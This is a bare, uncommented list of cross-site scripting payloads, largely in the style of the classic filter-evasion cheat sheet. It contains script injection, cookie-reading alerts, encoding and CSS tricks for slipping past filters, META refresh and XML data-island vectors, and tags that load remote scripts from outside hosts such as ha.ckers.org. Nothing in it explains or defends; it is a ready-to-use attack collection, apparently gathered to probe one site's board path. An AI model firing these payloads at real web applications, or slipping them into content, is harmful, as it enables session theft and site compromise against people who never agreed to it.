<html>
<body onload='alert("xss")'></body>
</html>

<img src="<img src=x"/onerror=alert("xss")//">

<h1><font color="#00FF00">I like turtles</font></h1>

"><script>alert(/turtles/);</script>

'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">

“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>

“><ScRiPt>alert(document.cookie)</script>

“><<script>alert(document.cookie);//<</script>

foo%00<script>alert(document.cookie)</script>

<scr<script>ipt>alert(document.cookie)</scr</script>ipt>

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2fscript%3E

‘; alert(document.cookie); var foo=’

foo\’; alert(document.cookie);//’;

</script><script >alert(document.cookie)</script>

<img src=asdf onerror=alert(document.cookie)>

<BODY ONLOAD=alert(’XSS’)>

s%22%20style=x:expression(alert(document.cookie))

<script>alert(document.cookie)</script>

s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29

%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>

</title><meta http-equiv='content-type' content='text/html;charset=utf-7'>
"><script>alert(document.location)</script><"
"><iframe src=http://www.google.de>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG LOWSRC="javascript:alert('XSS')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<IMG SRC='vbscript:msgbox("XSS")'>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029'\0029">
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e
‘; alert(document.cookie); var foo=’


"><Script>alert(/1/)</script> <iframe//onload=alert(/2/)></iframe>
%22%3E%3CScript%3Ealert(%2F3%2F)%3C%2Fscript%3E%20%3Ciframe%2F%2Fonload%3Dalert(%2F4%2F)%3E%3C%2Fiframe%3E
javascript:alert("5")



---------------


';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<1>=&{()}
<IMG SRC="jav&#x0D;ascript:alert('2');">
<IMG SRC="jav&#x0A;ascript:alert('3');">
<IMG SRC="jav&#x09;ascript:alert('4');">
<IMG SRC="jav ascript:alert('5');">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG """><SCRIPT>alert("6")</SCRIPT>">
<IMG SRC=`javascript:alert("RSnake says, '7'")`>
<IMG SRC=javascript:alert(&quot;8&quot;)>
<IMG SRC=JaVaScRiPt:alert('9')>
<IMG SRC=javascript:alert('10')>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<BGSOUND SRC="javascript:alert('11');">
<IMG LOWSRC="javascript:alert('12')">
<IMG DYNSRC="javascript:alert('13')">
<BODY ONLOAD=alert('14')>
<BODY BACKGROUND="javascript:alert('15')">
<INPUT TYPE="IMAGE" SRC="javascript:alert('16');">
</TITLE><SCRIPT>alert("17");</SCRIPT>
\";alert('18');//
<SCRIPT>a=/19/
alert(a.source)</SCRIPT>
<IMG SRC="javascript:alert('20')"
<SCRIPT SRC=//ha.ckers.org/.j>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert("21");//<</SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("22")>
<SCRIPT/23 SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<IMG SRC=" &#14; javascript:alert('24');">
<DIV STYLE="background-image: url(&#1;javascript:alert('25'))"><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><TABLE><TD BACKGROUND="javascript:alert('26')"><TABLE BACKGROUND="javascript:alert('XSS')"><FRAMESET><FRAME SRC="javascript:alert('27');"></FRAMESET>
<IFRAME SRC="javascript:alert('28');"></IFRAME>
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('29');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('30');">
¼script¾alert(¢31¢)¼/script¾
<IMG SRC="livescript:[code]">
<IMG SRC="mocha:[code]">
<IMG SRC='vbscript:msgbox("32")'>
<STYLE>li {list-style-image: url("javascript:alert('33')");}</STYLE><UL><LI>XSS
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<LINK REL="stylesheet" HREF="javascript:alert('34');">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<BR SIZE="&{alert('35')}">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<? echo('<SCR)';
echo('IPT>alert("36")</SCRIPT>'); ?> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <SCRIPT SRC="Loading Image..."></SCRIPT> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="37&lt;SCRIPT DEFER&gt;alert(&quot;38&quot;)&lt;/SCRIPT&gt;"> </BODY></HTML> <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="39"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('39')"&gt;</B></I></XML>
<SPAN DATASRC="#40" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('41');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML xmlns:42>
<?import namespace="43" implementation="http://ha.ckers.org/xss.htc">
</HTML>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('44')></OBJECT>
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<BASE HREF="javascript:alert('45');//">
<!--[if gte IE 4]>
<SCRIPT>alert('46');</SCRIPT>
<![endif]-->
<STYLE type="text/css">BODY{background:url("javascript:alert('47')")}</STYLE>
<STYLE>.48{background-image:url("javascript:alert('48')");}</STYLE><A CLASS=48></A>
<STYLE TYPE="text/javascript">alert('49');</STYLE>
exp/*<A STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
<XSS STYLE="50:expression(alert('50'))">
<IMG STYLE="51:expr/*15*/ession(alert('51'))">
<STYLE>@im\port'\ja\vasc\ript:alert("52")';</STYLE>
<DIV STYLE="width: expression(alert('53'));">
<DIV STYLE="background-image: url(javascript:alert('54'))">
<A HREF="http://www.gohttp://www.google.com/ogle.com/">55</A>
<A HREF="javascript:document.location='http://www.google.com/'">56</A>
<A HREF="http://www.google.com./">57</A>
<A HREF="http://google.com/">58</A>
<A HREF="http://google:ha.ckers.org">59</A>
<A HREF="http://***@google">60</A>
<A HREF="//google">61</A>
<A HREF="//www.google.com/">62</A>
<A HREF="h
tt p://6&#9;6.000146.0x7.147/">63</A> <A HREF="http://0102.0146.0007.00000223/">64</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">66</A> <A HREF="http://1113982867/">65</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">67</A> <A HREF="http://66.102.7.147/">68</A> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('69')&lt;/SCRIPT&gt;">

/twin4704/MYHOMPY/board/coverstory/coverstory_view.html



/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"/-alert(6)//><img src=1 onerror=alert(1)>'"><Script>alert(/7/)</script> <iframe//onload=alert(/8/)></iframe>